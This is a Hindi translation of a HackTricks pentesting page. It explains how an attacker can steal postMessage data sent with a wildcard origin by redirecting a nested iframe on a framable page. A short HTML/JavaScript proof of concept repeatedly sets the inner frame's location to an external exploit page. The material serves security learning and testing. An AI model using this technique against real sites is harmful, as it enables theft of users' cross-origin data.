hacktricks/pentesting-web/postmessage-vulnerabilities/steal-postmessage-modifying-iframe-location.md
Translator workflow 75e8745ba3 Translated to Hindi
2023-11-06 08:38:02 +00:00

6.7 KiB

पोस्टमैसेज संदेशों को चुराना और आईफ्रेम के स्थान को संशोधित करना

☁️ HackTricks Cloud ☁️ -🐦 Twitter 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥

बच्चा आईफ्रेम के स्थानों को बदलना

इस व्राइटअप के अनुसार, यदि आप एक वेबपेज को आईफ्रेम के रूप में शामिल कर सकते हैं जिसमें X-Frame-Header नहीं है और वह एक और आईफ्रेम को शामिल करता है, तो आप उस बच्चा आईफ्रेम के स्थान को बदल सकते हैं

उदाहरण के लिए, यदि abc.com के पास efg.com आईफ्रेम है और abc.com के पास X-Frame हैडर नहीं है, तो मैं एविल.कॉम को ईविल.कॉम के संबंधित आईफ्रेम (बच्चा या माता-पिता) के स्थान को बदलकर इस्तेमाल करके ईविल.कॉम को क्रॉस ऑरिजिन बना सकता हूँ, frames.location

यह विशेष रूप से पोस्टमैसेज में उपयोगी है क्योंकि यदि कोई पेज संवेदनशील डेटा को एक वाइल्डकार्ड का उपयोग करके भेज रहा है जैसे windowRef.postmessage("","*"), तो संबंधित आईफ्रेम (बच्चा या माता-पिता) के स्थान को हमलावर के नियंत्रण में स्थित स्थान पर बदलकर उस डेटा को चुरा सकते हैं।

<html>
<iframe src="https://docs.google.com/document/ID" />
<script>
//pseudo code
setTimeout(function(){ exp(); }, 6000);

function exp(){
//needs to modify this every 0.1s as it's not clear when the iframe of the iframe affected is created
setInterval(function(){
window.frames[0].frame[0][2].location="https://geekycat.in/exploit.html";
}, 100);
}
</script>
</html>
☁️ HackTricks Cloud ☁️ -🐦 Twitter 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥